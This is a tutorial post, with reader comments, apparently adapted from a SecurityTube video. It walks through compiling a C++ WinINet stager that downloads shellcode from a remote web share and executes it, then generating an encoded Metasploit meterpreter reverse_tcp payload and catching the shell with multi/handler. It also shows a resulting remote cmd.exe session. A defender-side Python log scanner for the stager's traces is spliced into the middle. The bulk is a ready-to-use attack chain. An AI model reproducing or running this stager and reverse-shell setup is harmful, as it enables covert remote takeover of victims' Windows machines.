control – respect to armitage1989

This is not an original idea. Please view http://www.securitytube.net/video/2908 and pay respect to Armitage1989.

Apache server set up

1. Set up a share folder.

mkdir /var/www/share

chmod -R 755 /var/www/share/

chown -R www-data:www-data /var/www/share/

To verify that the share directory exists, type
ls -la /var/www/ | grep share

#########################

2. Start web server

service apache2 start

To shut down simply replace start with stop.

##########################

3. If not installed

apt-get install apache2

##########################

4. Copy files to the share

cp /root/.msf4/data/exploits/* /var/www/share/
-> * is a wildcard that selects all of the folder's contents

###########################

5. Access the file from another machine

http://(server's ip)/share

#############################

please watch http://www.securitytube.net/video/2908

Armitage1989 created the C++ code, which was originally posted at http://pastebin.com/u/armitage1989

Download Dev-C++ 4.9.9.2 for Windows from http://www.bloodshed.net/dev/devcpp.html

1. Create a new project / Windows Application, click OK and save it to a location of your choice.
2. Delete everything in the editor window and paste in the code below.
3. In the Project window, right-click your project and choose Project Options (or press Alt+P).
4. Under the Parameters tab, paste -lwininet into the Linker box and press OK.
5. Compile, saving the result to a location of your choice.

Copy the code below and paste it in

//include the wininet library: it provides InternetOpen(), InternetOpenUrl(), InternetReadFile() and InternetCloseHandle()
#include <windows.h>
#include <iostream>
#include <cstdio>
#include <cstring>
#include <Wininet.h>
using namespace std;
//buffer that receives the shellcode; it lives in the .bss data section
//(in a process running with DEP enforced that section is not executable, so the jump into it below faults)
unsigned char DataReceived[500];
int main(){
int i;
//configure an HTTP agent; INTERNET_OPEN_TYPE_PRECONFIG means the machine's own proxy settings are used
HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
//validate the connection handle
if(!connect){
cout<<"Connection Failed or Syntax error";
return 0;
}
//open the malicious url
HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);

//check the handle for the URL
if ( !OpenAddress )
{
DWORD ErrorNum = GetLastError();
cout<<"Failed to open URL \nError No: "<<ErrorNum;
InternetCloseHandle(connect);
return 0;
}

DWORD NumberOfBytesRead = 0;

//fetch the file from the server and save the data into DataReceived
//(the read is bounded by sizeof DataReceived; the original asked for 4096 bytes into a 500-byte buffer, which overflows it)
while(InternetReadFile(OpenAddress, DataReceived, sizeof DataReceived, &NumberOfBytesRead) && NumberOfBytesRead )
{
//print the bytes actually received in \xNN format; you can delete this routine
for(i=0;i<(int)NumberOfBytesRead; i++ ){

printf("\\x%02x",DataReceived[i]);

}
/*this routine is another implementation of shellcode-test, but here the __asm() directive is used to issue asm instructions.
1) first a pointer to the buffer is stored in the EAX register
2) push eax: the pointer to DataReceived is now on the stack, so esp points at it
3) the ret instruction pops that value into eip and passes execution to it
4) finally the shellcode in DataReceived is executed
5) all handles are closed
NOTE:
you can put a nopsled before the shellcode to stabilise execution.
use FreeConsole to hide the DOS window
*/
__asm ("lea _DataReceived, %eax");
__asm ("push %eax");
__asm ("ret");
}

InternetCloseHandle(OpenAddress);
InternetCloseHandle(connect);

return 0;
}
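As an added defender-side example (it is not part of the original post or of Armitage1989's code), the Python below scans Apache access-log lines from the share for the two things the stager above leaves behind: the hard-coded "MyBrowser" agent string passed to InternetOpen(), and a successful fetch of a raw .bin payload file. The log lines are constructed for this example, and the combined log format is assumed to be the stock apache2 configuration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# (assumption: the share is served by a stock apache2 using this default format).
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the stager source above: the agent string it hands to
# InternetOpen(), and raw payload files (.bin) pulled from the share.
STAGER_UA = "MyBrowser"
RAW_PAYLOAD_SUFFIXES = (".bin",)

# Constructed sample log lines for the example (not real traffic).
SAMPLE_LOG = """\
192.168.16.20 - - [10/Mar/2014:12:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/27.0"
192.168.16.20 - - [10/Mar/2014:12:01:09 +0000] "GET /ascii.bin HTTP/1.1" 200 341 "-" "MyBrowser"
192.168.16.21 - - [10/Mar/2014:12:02:30 +0000] "GET /share/your-file.bin HTTP/1.1" 200 341 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
192.168.16.22 - - [10/Mar/2014:12:03:00 +0000] "GET /share/ascii.bin HTTP/1.1" 404 210 "-" "MyBrowser"
""".splitlines()


@dataclass
class Hit:
    client: str
    path: str
    size: int
    reasons: List[str]


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def find_stager_fetches(lines: Iterable[str]) -> List[Hit]:
    """Return the successful (HTTP 200) requests that look like the stager pulling a payload."""
    hits: List[Hit] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != "200":
            continue
        reasons = []
        if rec["ua"] == STAGER_UA:
            reasons.append("hard-coded InternetOpen agent string")
        if rec["path"].lower().endswith(RAW_PAYLOAD_SUFFIXES):
            reasons.append("raw .bin download from share")
        if reasons:
            size = int(rec["size"]) if rec["size"] != "-" else 0
            hits.append(Hit(rec["client"], rec["path"], size, reasons))
    return hits


if __name__ == "__main__":
    for hit in find_stager_fetches(SAMPLE_LOG):
        print(f"{hit.client} fetched {hit.path} ({hit.size} bytes): {', '.join(hit.reasons)}")
```

Because the stager opens WinINet with INTERNET_OPEN_TYPE_PRECONFIG, it honours the machine's proxy settings, so the same request also shows up in the proxy's logs, where the same two fields can be checked; the 404 line is skipped on purpose, since only a successful fetch means a payload actually reached the host.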

############################

please watch http://www.securitytube.net/video/2908

start msfconsole

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (ip address)
set lport (port of choice)
exploit

open new console window and

msfpayload windows/meterpreter/reverse_tcp LHOST=(ip address) LPORT=(port of choice) R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 x>/var/www/share/your-file.bin

Once the exe is run on the target machine, Meterpreter should report a session:

meterpreter > execute -f cmd.exe -c
Process 2508 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

2 thoughts on “control – respect to armitage1989”

  1. Under script change ip address and location to share if required? “http://192.168.1.2/share/your-file.bin”

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 x>/var/www/share/your-file.bin

    use multi/handler
    set windows/meterpreter/reverse_tcp lhost 192.168.1.2 lport 4445
    exploit

  2. Update 100% works

    msfpayload windows/meterpreter/reverse_tcp LHOST=ip-address LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 x>/var/www/share/myexploit.bin

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost IP Address
    set lport 4445
    exploit
